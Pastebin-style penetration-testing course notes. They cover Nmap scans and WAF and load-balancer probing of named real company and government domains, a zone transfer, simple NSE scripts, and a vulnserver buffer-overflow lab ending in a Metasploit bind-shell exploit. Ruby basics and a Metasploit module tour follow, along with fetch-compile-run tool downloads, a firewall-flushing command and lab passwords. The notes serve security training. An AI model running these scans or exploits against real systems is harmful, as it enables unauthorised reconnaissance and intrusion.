· 6 years ago · Nov 27, 2019, 05:02 PM
1##############################
2# Basic Scanning Methodology #
3# Transition from Blue to #
4# Red Team Tactics #
5##############################
6
7- Ping Sweep
8What's alive?
9---------------------------Type This-----------------------------------
10sudo nmap -sP 157.166.226.*
11 strategicsec
12-------------------------------------------------------------------------
13
14
15 -if -SP yields no results try:
16---------------------------Type This-----------------------------------
17sudo nmap -sL 157.166.226.*
18 strategicsec
19-------------------------------------------------------------------------
20
21
22 -Look for hostnames:
23---------------------------Type This-----------------------------------
24sudo nmap -sL 157.166.226.* | grep com
25 strategicsec
26-------------------------------------------------------------------------
27
28
29- Port Scan
30What's where?
31---------------------------Type This-----------------------------------
32sudo nmap -sS 162.243.126.247
33 strategicsec
34-------------------------------------------------------------------------
35
36
37
38- Bannergrab/Version Query
39What versions of software are running
40---------------------------Type This-----------------------------------
41sudo nmap -sV 162.243.126.247
42 strategicsec
43-------------------------------------------------------------------------
44
45
46
47- Vulnerability Research
48Lookup the banner versions for public exploits
49----------------------------------------------
50http://exploit-db.com
51http://securityfocus.com/bid
52https://packetstormsecurity.com/files/tags/exploit/
53
54
55-------------------------------------------------------------------------
56
57
58---------------------------Type This-----------------------------------
59cd ~/toolz
60
61wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
62
63gcc ipcrawl.c -o ipcrawl
64
65chmod 777 ipcrawl
66
67./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
68
69
70sudo nmap -sL 148.87.1.0-255
71 strategicsec
72sudo nmap -sL 148.87.1.0-255 | grep oracle
73 strategicsec
74
75
76
77wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
78
79gcc propecia.c -o propecia
80
81sudo cp propecia /bin
82 strategicsec
83
84propecia 162.243.126 22
85
86propecia 162.243.126 80
87
88propecia 162.243.126 443
89
90propecia 162.243.126 3389
91-------------------------------------------------------------------------
92
93
94
95
96
97
98
99###########################
100# Target IP Determination #
101###########################
102---------------------------Type This-----------------------------------
103cd /home/strategicsec/toolz
104
105perl blindcrawl.pl -d motorola.com
106----------------------------------------------------------------------
107
108-- Take each IP address and look ip up here:
109http://www.networksolutions.com/whois/index.jsp
110
111
112Zone Transfer fails on most domains, but here is an example of one that works:
113---------------------------Type This-----------------------------------
114dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
115
116
117cd ~/toolz/
118./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
119
120
121sudo nmap -sL 148.87.1.0-255
122 strategicsec
123
124
125sudo nmap -sL 148.87.1.0-255 | grep oracle
126 strategicsec
127----------------------------------------------------------------------
128
129
130
131
132###########################
133# Load Balancer Detection #
134###########################
135
136Here are some options to use for identifying load balancers:
137 - http://toolbar.netcraft.com/site_report
138 - https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
139
140
141Here are some command-line options to use for identifying load balancers:
142---------------------------Type This-----------------------------------
143dig microsoft.com
144
145cd ~/toolz
146./lbd-0.1.sh microsoft.com
147
148
149halberd microsoft.com
150halberd motorola.com
151halberd oracle.com
152----------------------------------------------------------------------
153
154
155######################################
156# Web Application Firewall Detection #
157######################################
158---------------------------Type This-----------------------------------
159cd ~/toolz/wafw00f
160python wafw00f.py http://www.oracle.com
161python wafw00f.py http://www.strategicsec.com
162
163
164cd ~/toolz/
165sudo nmap -p 80 --script http-waf-detect.nse oracle.com
166 strategicsec
167
168sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov
169 strategicsec
170----------------------------------------------------------------------
171
172#####################################
173# Writing Your Own Nmap NSE Scripts #
174#####################################
175---------------------------Type This-----------------------------------
176sudo rm -rf /usr/share/nmap/scripts/intro-nse.nse
177
178sudo vi /usr/share/nmap/scripts/intro-nse.nse
179-----------------------------------------------------------------------
180
181---------------------------Paste This----------------------------------
182-- The Head Section --
183-- The Rule Section --
184portrule = function(host, port)
185 return port.protocol == "tcp"
186 and port.number == 80
187 and port.state == "open"
188end
189
190-- The Action Section --
191action = function(host, port)
192 return "RedTeam!"
193end
194----------------------------------------------------------------------
195
196- Ok, now that we've made that change let's run the script
197---------------------------Type This-----------------------------------
198sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
199----------------------------------------------------------------------
200
201
202
203
204
205----------------------------------------------------------------------
206sudo vi /usr/share/nmap/scripts/intro-nse.nse
207----------------------------------------------------------------------
208
209---------------------------Paste This----------------------------------
210-- The Head Section --
211local shortport = require "shortport"
212
213-- The Rule Section --
214portrule = shortport.http
215
216
217-- The Action Section --
218action = function(host, port)
219 return "RedTeam!"
220end
221----------------------------------------------------------------------
222
223- Ok, now that we've made that change let's run the script
224---------------------------Type This-----------------------------------
225sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
226----------------------------------------------------------------------
227
228
229
230
231
232
233OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
234
235
236---------------------------Type This-----------------------------------
237sudo vi /usr/share/nmap/scripts/intro-nse.nse
238----------------------------------------------------------------------
239
240
241---------------------------Paste This----------------------------------
242-- The Head Section --
243local shortport = require "shortport"
244local http = require "http"
245
246-- The Rule Section --
247portrule = shortport.http
248
249-- The Action Section --
250action = function(host, port)
251
252 local uri = "/installing-metasploit-in-ubunt/"
253 local response = http.get(host, port, uri)
254 return response.status
255
256end
257----------------------------------------------------------------------
258
259- Ok, now that we've made that change let's run the script
260---------------------------Type This-----------------------------------
261sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
262----------------------------------------------------------------------
263
264
265
266----------------------------------------------------------------------
267sudo vi /usr/share/nmap/scripts/intro-nse.nse
268----------------------------------------------------------------------
269
270---------------------------Paste This----------------------------------
271-- The Head Section --
272local shortport = require "shortport"
273local http = require "http"
274
275-- The Rule Section --
276portrule = shortport.http
277
278-- The Action Section --
279action = function(host, port)
280
281 local uri = "/installing-metasploit-in-ubunt/"
282 local response = http.get(host, port, uri)
283
284 if ( response.status == 200 ) then
285 return response.body
286 end
287
288end
289----------------------------------------------------------------------
290
291- Ok, now that we've made that change let's run the script
292---------------------------Type This-----------------------------------
293sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
294----------------------------------------------------------------------
295
296
297
298
299
300
301
302---------------------------Type This-----------------------------------
303sudo vi /usr/share/nmap/scripts/intro-nse.nse
304----------------------------------------------------------------------
305
306
307---------------------------Paste This----------------------------------
308-- The Head Section --
309local shortport = require "shortport"
310local http = require "http"
311local string = require "string"
312
313-- The Rule Section --
314portrule = shortport.http
315
316-- The Action Section --
317action = function(host, port)
318
319 local uri = "/installing-metasploit-in-ubunt/"
320 local response = http.get(host, port, uri)
321
322 if ( response.status == 200 ) then
323 local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
324 return title
325 end
326
327end
328----------------------------------------------------------------------
329
330- Ok, now that we've made that change let's run the script
331---------------------------Type This-----------------------------------
332sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
333----------------------------------------------------------------------
334
335
336
337
338
339
340
341---------------------------Type This-----------------------------------
342sudo vi /usr/share/nmap/scripts/intro-nse.nse
343----------------------------------------------------------------------
344
345---------------------------Paste This----------------------------------
346-- The Head Section --
347local shortport = require "shortport"
348local http = require "http"
349local string = require "string"
350
351-- The Rule Section --
352portrule = shortport.http
353
354-- The Action Section --
355action = function(host, port)
356
357 local uri = "/installing-metasploit-in-ubunt/"
358 local response = http.get(host, port, uri)
359
360 if ( response.status == 200 ) then
361 local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
362
363 if (title) then
364 return "Vulnerable"
365 else
366 return "Not Vulnerable"
367 end
368 end
369end
370
371----------------------------------------------------------------------
372
373- Ok, now that we've made that change let's run the script
374---------------------------Type This-----------------------------------
375sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
376----------------------------------------------------------------------
377
378
379
380#####################################
381# Quick Stack Based Buffer Overflow #
382#####################################
383
384- You can download everything you need for this exercise (except netcat) from the link below
385https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
386
387- Extract this zip file to your Desktop
388
389- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
390
391- Open a new command prompt and type:
392nc localhost 9999
393
394- In the new command prompt window where you ran nc type:
395HELP
396
397- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
398- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
399
400- Now double-click on 1-simplefuzzer.py
401- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
402
403
404- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
405
406- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
407
408- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
409
410- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
411
412- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
413
414- Calculate the distance to EIP by running script 3-3000chars.py
415- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
416
4174-count-chars-to-EIP.py
418- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
419- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
420
4215-2006char-eip-check.py
422- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
423
4246-jmp-esp.py
425- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
426
4277-first-exploit
428- In this script we actually do the stack overflow and launch a bind shell on port 4444
429
4308 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
431
432
433------------------------------
434
435cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
436
437vi vulnserv.rb (paste the code into this file)
438
439
440
441cd ~/toolz/metasploit
442
443./msfconsole
444
445
446
447use exploit/windows/misc/vulnserv
448set PAYLOAD windows/meterpreter/bind_tcp
449set RHOST 192.168.88.129
450set RPORT 9999
451exploit
452
453
454
455
456
457
458
459Code to analyze:
460https://downloads.securityfocus.com/vulnerabilities/exploits/07.30.dcom48.c
461
462
463
464
465
466
467Metasploit Next Level
468
469
470##########################
471# Download the attack VM #
472##########################
473https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
474user: infosecaddicts
475pass: infosecaddicts
476
477
478
479
480
481###########################
482# Download the victim VMs #
483###########################
484https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
485user: workshop
486pass: password
487
488
489###########################
490# Exploit Development VMs #
491###########################
492Note: this link will work tomorrow
493https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
494
495user: administrator
496pass: strategicsec
497
498
499https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
500user: strategicsec
501pass: strategicsec
502
503
504
505
506
507############################################################
508# Section 1: Ruby Fundamentals and Metasploit Architecture #
509############################################################
510
511############################
512# Day 1: Ruby Fundamentals #
513############################
514
515
516
517- Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
518scientist and programmer from Japan. It is a cross-platform dynamic language.
519
520- The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
521on Rails is a framework that is written in Ruby.
522
523- Ruby's file name extensions are .rb and .rbw.
524
525- official website of this
526
527- language: www.ruby-lang.org.
528
529
530- interactive Shell called Ruby Shell
531
532
533- Installing and Running IRB
534
535---------------------------Type This-----------------------------------
536ruby -v
537-----------------------------------------------------------------------
538
539
540If you don't have ruby2.3 use the commands below:
541-----------------------------------------------------------------------
542sudo apt-get install ruby2.3 ruby2.3-dev ruby2.3-doc irb rdoc ri
543-----------------------------------------------------------------------
544
545- open up the interactive console and play around.
546
547---------------------------Type This-----------------------------------
548irb
549-----------------------------------------------------------------------
550
551
552- Math, Variables, Classes, Creating Objects and Inheritance
553
554
555The following arithmetic operators:
556 Addition operator (+) — 10 + 23
557 Subtraction operator (-) — 1001 - 34
558 Multiplication operator (*) — 5 * 5
559 Division operator (/) — 12 / 2
560
561
562
563- Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
564operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
56530. Again, 69 is assigned to y, and then y is incremented by 33.
566
567---------------------------Type This-----------------------------------
568x = 25
569x + 30
570y = 69
571y+33
572-----------------------------------------------------------------------
573
574
575
576- Let's look at creating classes and creating objects.
577
578- Here, the name of the class is Strategicsec. An object has its properties and methods.
579
580
581---------------------------Type This-----------------------------------
582class Attack
583attr_accessor :of, :sqli, :xss
584end
585-----------------------------------------------------------------------
586
587
588What is nil?
589Reference:
590https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
591
592nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
593
594Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
595
596To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
597
598
599
600
601
602# Now that we have created the classes let's create the objects
603---------------------------Type This-----------------------------------
604first_attack = Attack.new
605first_attack.of = "stack"
606first_attack.sqli = "blind"
607first_attack.xss = "dom"
608puts first_attack.of
609puts first_attack.sqli
610puts first_attack.xss
611-----------------------------------------------------------------------
612
613
614
615
616- Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
617inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
618one object can access the properties/attributes of another object of a different class. Inheritance makes your
619programming life easier by maximizing code reuse.
620
621
622---------------------------Type This-----------------------------------
623class Exploitframeworks
624attr_accessor :scanners, :exploits, :shellcode, :postmodules
625end
626class Metasploit < Exploitframeworks
627end
628class Canvas < Exploitframeworks
629end
630class Coreimpact < Exploitframeworks
631end
632class Saint < Exploitframeworks
633end
634class Exploitpack < Exploitframeworks
635end
636-----------------------------------------------------------------------
637
638
639
640
641- Methods, More Objects, Arguments, String Functions and Expression Shortcuts
642
643- Let's create a simple method. A method is used to perform an action and is generally called with an object.
644
645- Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
646it will print this string: "We are Learning how to PenTest"
647
648- An object named 'bo' is created, which is used to call the method.
649
650
651---------------------------Type This-----------------------------------
652class Msfnl
653def learning
654puts "We are Learning how to PenTest"
655end
656end
657-----------------------------------------------------------------------
658
659#Now let's define an object for our Method
660
661---------------------------Type This-----------------------------------
662joe = Msfnl.new
663joe.learning
664-----------------------------------------------------------------------
665
666
667
668- An argument is a value or variable that is passed to the function while calling it. In the following example, while
669calling the puts() function, we are sending a string value to the function. This string value is used by the
670function to perform some particular operations.
671
672puts ("Pentesting")
673
674
675- There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
676explain some useful string functions with an example.
677
678- The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
679reverse function reverses a string. The following example demonstrates how to use the string functions.
680
681---------------------------Type This-----------------------------------
68255.class
683"I Love Programming".class
684"I Love Pentesting".length
685"Pown that box".upcase
686"Love" + "To Root Boxes"
687"evil".reverse
688"evil".reverse.upcase
689-----------------------------------------------------------------------
690
691
692- expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is
693an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
694examples of some expressions.
695
696---------------------------Type This-----------------------------------
697a = 3
698b = 6
699a+b+20
700d = 44
701f = d
702puts f
703-----------------------------------------------------------------------
704
705
706
707
708
709- shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
710assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
711statements to understand the shortcuts.
712
713---------------------------Type This-----------------------------------
714g = 70
715g = g+44
716g += 33
717-----------------------------------------------------------------------
718
719
720- In the above statement, g is incremented by 33 and then the total value is assigned to g.
721
722
723
724---------------------------Type This-----------------------------------
725g *= 3
726-----------------------------------------------------------------------
727
728
729- In the above statement, g is multiplied with 3 and then assigned to g.
730
731- Example
732
733- Comparison Operators, Loops, Data Types, and Constants
734
735- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
736how to use the following comparison operators.
737
738'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
739variable or constant. If it's less than the other, the 'less than' operator returns true.
740
741'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
742or constant. If it's equal to the other, the 'equal to' operator returns true.
743
744'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
745variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
746
747---------------------------Type This-----------------------------------
748numberofports = 55
749puts "number of ports found during scan" if numberofports < 300
750numberofports = 400
751puts "number of ports found during scan" if numberofports < 300
752puts "number of ports found during scan" if numberofports == 300
753puts "number of ports found during scan" if numberofports != 300
754-----------------------------------------------------------------------
755
756
757
758Example
759
760
761- the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.
762
763- This operator is generally used to combine multiple conditions.
764- In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
765
766- following example to understand how this operator works.
767
768---------------------------Type This-----------------------------------
769ports = 100
770puts "number of ports found on the network" if ports<100 || ports>200
771puts "number of ports found on the network" if ports<100 || ports>75
772-----------------------------------------------------------------------
773
774# unless
775
776---------------------------Type This-----------------------------------
777portsbelow1024 = 50
778puts "If the ports are below 1024" unless portsbelow1024 < 1000
779puts "If the ports are below 1024" unless portsbelow1024 < 1055
780puts "If the ports are below 1024" unless portsbelow1024 < 20
781-----------------------------------------------------------------------
782
783- The 'unless' keyword is used to do something programmatically unless a condition is true.
784
785
786
787- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
788
789- See the following example to understand how a string is printed 10 times on the screen using a loop.
790
791---------------------------Type This-----------------------------------
79210.times do puts "infosecaddicts" end
793-----------------------------------------------------------------------
794
795# Or use the curly braces
796
797---------------------------Type This-----------------------------------
79810.times {puts "infosecaddicts"}
799-----------------------------------------------------------------------
800
801
802- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
803working with different data types. Data type conversion is also known as type casting.
804
805
806
807- Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
808change the value of a constant, you will see a warning message.
809
810
811
812
813- Multiple Line String Variable, Interpolation, and Regular Expressions
814
815- A multiple line string variable lets you assign the value to the string variable through multiple lines.
816
817---------------------------Type This-----------------------------------
818infosecaddicts = <<mark
819welcome
820to the
821best
822metasploit
823course
824on the
825market
826mark
827puts infosecaddicts
828-----------------------------------------------------------------------
829
830
831- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
832it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
833Examine the following example to understand how interpolation works in Ruby.
834
835References:
836https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
837
838
839---------------------------Type This-----------------------------------
840a = 4
841b = 6
842puts "a * b = a*b"
843puts " #{a} * #{b} = #{a*b} "
844person = "Joe McCray"
845puts "IT Security consultant person"
846puts "IT Security consultant #{person}"
847-----------------------------------------------------------------------
848
849- Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
850
851
852
853
854
855- Character classes
856---------------------------Type This-----------------------------------
857infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
858"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
859"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
860-----------------------------------------------------------------------
861
862
863- Arrays, Push and Pop, and Hashes
864
865
866- In the following example, numbers is an array that holds 6 integer numbers.
867
868
869---------------------------Type This-----------------------------------
870numbers = [2,4,6,8,10,100]
871puts numbers[0]
872puts numbers[4]
873numbers[2] = 150
874puts numbers
875-----------------------------------------------------------------------
876
877
878
879- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
880
881
882---------------------------Type This-----------------------------------
883framework = []
884framework << "modules"
885framework << "exploits"
886framework << "payloads"
887framework.pop
888framework.shift
889-----------------------------------------------------------------------
890
891- Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
892that is used to access the element.
893
894
895- Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
896In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
897respective values: 'what module should you use', 'Windows XP' and 'SSH'.
898
899---------------------------Type This-----------------------------------
900metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
901print metasploit.size
902print metasploit["microsoft"]
903metasploit['microsoft'] = 'redhat'
904print metasploit['microsoft']
905-----------------------------------------------------------------------
906
907
908
909- Writing Ruby Scripts
910
911
912- Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
913this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
914someone made to look for a specific port. The port that it is looking for is port 21 FTP.
915---------------------------Type This-----------------------------------
916cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
917ls
918-----------------------------------------------------------------------
919
920ack.rb ftpbounce.rb syn.rb tcp.rb xmas.rb
921
922- Lets look at tcp.rb
923
924
925
926- Let's take the time now to create and design our own port scanner what we will design here is a port scanner that
927will scan for port up to 0-1024. And we will add a function in there for the port scanner to prompt us stating OPEN
928port if it detects it. This is a pretty basic script, but it will help you in the event that you need to write
929something on the fly.
930
931
932-----------------------------------------------------------------------
933- PortScanner.rb :
934
935require 'socket'
936require 'timeout'
937
938puts "Enter IP Address to Scan:"
939ipaddress = gets
940
9411.upto(1024) {|port|
942 begin
943 timeout(5) do
944 TCPSocket.open(ipaddress.chop, port)
945 end
946 puts "Response/Port Open: #{port}"
947 rescue Timeout::Error
948 # uncomment the following line to show closed ports (noisy!)
949 #puts "No Response /Port closed: #{port}"
950 rescue
951 # uncomment the following line to show closed ports (noisy!)
952 #puts "No Response /Port closed: #{port}"
953 end
954}
955
956---------------------------------------------------------------------------------
957
958Day 1 Homework:
959Send Ivana an email ivana{a-t}strategicsec{d-o-t}.com with a word document that contains screenshots of everything that we have covered so far. Make the subject of the email "First Name - Last Name - Metasploit Day 1" (ex: Joseph - McCray - Metasploit Day 1).
960
961Also be sure to name the attached file "FirstName.LastName.MetasploitDay1.docx" (Joseph.McCray.MetasploitDay1.docx).
962
963NOTE: This is what is required in order to receive your certificate of completion and CPEs.
964---------------------------------------------------------------------------------
965
966
967
968##################################
969# Day 2: Metasploit Fundamentals #
970##################################
971
972- Let's take a little look at Metasploit Framework
973
974- First, we should take note of the different directories, the Modular Architecture.
975
976The modules that make up the Modular Architecture are
977Exploits
978Auxiliary
979Payload
980Encoder
981Nops
982
983
984Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
985
986are
987
988Modules
989Scripts
990Plugins
991External
992Data
993Tools
994
995- Let's take a look inside the Metasploit directory and see what's the
996---------------------------Type This-----------------------------------
997cd ~/toolz/metasploit
998ls
999-----------------------------------------------------------------------
1000
1001
1002
1003- Now let's take a look inside the Modules directory and see what's there.
1004---------------------------Type This-----------------------------------
1005cd ~/toolz/metasploit/modules
1006ls
1007-----------------------------------------------------------------------
1008
1009
1010The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
1011not necessarily need to - have a shell or session started on a machine.
1012
1013The exploits directory has our modules that we need to pop a shell on a box.
1014The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
1015like Burp Suite
1016- Let's take a look at the external directory
1017---------------------------Type This-----------------------------------
1018cd ~/toolz/metasploit/external
1019ls
1020-----------------------------------------------------------------------
1021
1022- Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
1023---------------------------Type This-----------------------------------
1024cd ~/toolz/metasploit/data
1025ls
1026-----------------------------------------------------------------------
1027
1028- For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
1029brute-forcing
1030---------------------------Type This-----------------------------------
1031cd ~/toolz/metasploit/data/wordlists
1032ls
1033-----------------------------------------------------------------------
1034
1035- The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
1036once a session is created.
1037---------------------------Type This-----------------------------------
1038cd ~/toolz/metasploit/data/meterpreter
1039ls
1040-----------------------------------------------------------------------
1041
1042- The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
1043like escalating privileges and dumping hashes.
1044
1045These are being phased out, though, and post-exploitation modules are what is being more preferred.
1046The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
1047find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
1048for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
1049custom shellcode.
1050
1051The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
1052to do with other programs to make things like importing and exporting reports simple.
1053Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
1054the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
1055modules we're going to have a better understanding of where everything needs to go.
1056---------------------------Type This-----------------------------------
1057cd ~/toolz/metasploit/modules/exploits
1058ls
1059-----------------------------------------------------------------------
1060
1061
1062- The exploits directory is split up into several different directories, each one housing exploits for different types
1063of systems. I.E. Windows, Unix, OSX, dialup and so on.
1064Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
1065into categories of different types of services/programs, so that you can pick out an exploit specifically for the
1066service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
1067for us.
1068---------------------------Type This-----------------------------------
1069cd ~/toolz/metasploit/modules/auxiliary/
1070ls
1071-----------------------------------------------------------------------
1072
1073
1074- And a little further into the directory, let's take a look at what's in the scanner directory
1075---------------------------Type This-----------------------------------
1076cd ~/toolz/metasploit/modules/auxiliary/scanner/
1077ls
1078-----------------------------------------------------------------------
1079
1080
1081- And one more folder deeper into the structure, let's take a look in the portscan folder
1082---------------------------Type This-----------------------------------
1083cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
1084ls
1085-----------------------------------------------------------------------
1086
1087- If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
1088and report them back to us in a nice, easily readable format.
1089
1090cat tcp.rb
1091
1092
1093
1094- Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
1095once you have a session on a machine.
1096Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
1097succeeds.
1098---------------------------Type This-----------------------------------
1099cd ~/toolz/metasploit/modules/payloads/
1100ls
1101-----------------------------------------------------------------------
1102
1103
1104- There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
1105application for it to be used as.
1106Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
1107do everything once you have that shell calling back to you.
1108Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
1109the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
1110much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
1111to download Stages payloads.
1112
1113
1114- Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
1115shells.
1116---------------------------Type This-----------------------------------
1117cd singles
1118cd windows
1119ls
1120-----------------------------------------------------------------------
1121
1122
1123- We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
1124see what it actually does.
1125---------------------------Type This-----------------------------------
1126cat adduser.rb
1127-----------------------------------------------------------------------
1128
1129Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
1130the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
1131it gives Windows to add the user to the system.
1132
1133
1134- Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
1135
1136windows/shell/bind_tcp or windows/shell/reverse_tcp
1137---------------------------Type This-----------------------------------
1138cd ../../stagers
1139ls
1140-----------------------------------------------------------------------
1141
1142
1143
1144- Again, we can see that we have stagers for multiple systems and code types.
1145---------------------------Type This-----------------------------------
1146ls windows/
1147-----------------------------------------------------------------------
1148
1149
1150As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
1151machine, so we can upload or download our stage payloads and execute commands.
1152Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
1153our stagers...
1154---------------------------Type This-----------------------------------
1155cd ../stages
1156ls
1157-----------------------------------------------------------------------
1158
1159
1160Again, we can see that our stages are coded for particular operating systems and languages.
1161We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
1162victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
1163if any.
1164
1165- Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
1166already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
1167so we can impersonate other users on the system in hopes of elevating our privileges.
1168---------------------------Type This-----------------------------------
1169cd ../../../post/
1170ls
1171cd windows/
1172ls
1173-----------------------------------------------------------------------
1174
1175
1176Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
1177the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
1178escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
1179possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
1180memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
1181
1182
1183
1184###################################################
1185# Section 2: Actually Using Metasploit (For real) #
1186###################################################
1187---------------------------Type This-----------------------------------
1188sudo /sbin/iptables -F
1189
1190cd ~/toolz/metasploit
1191
1192./msfconsole
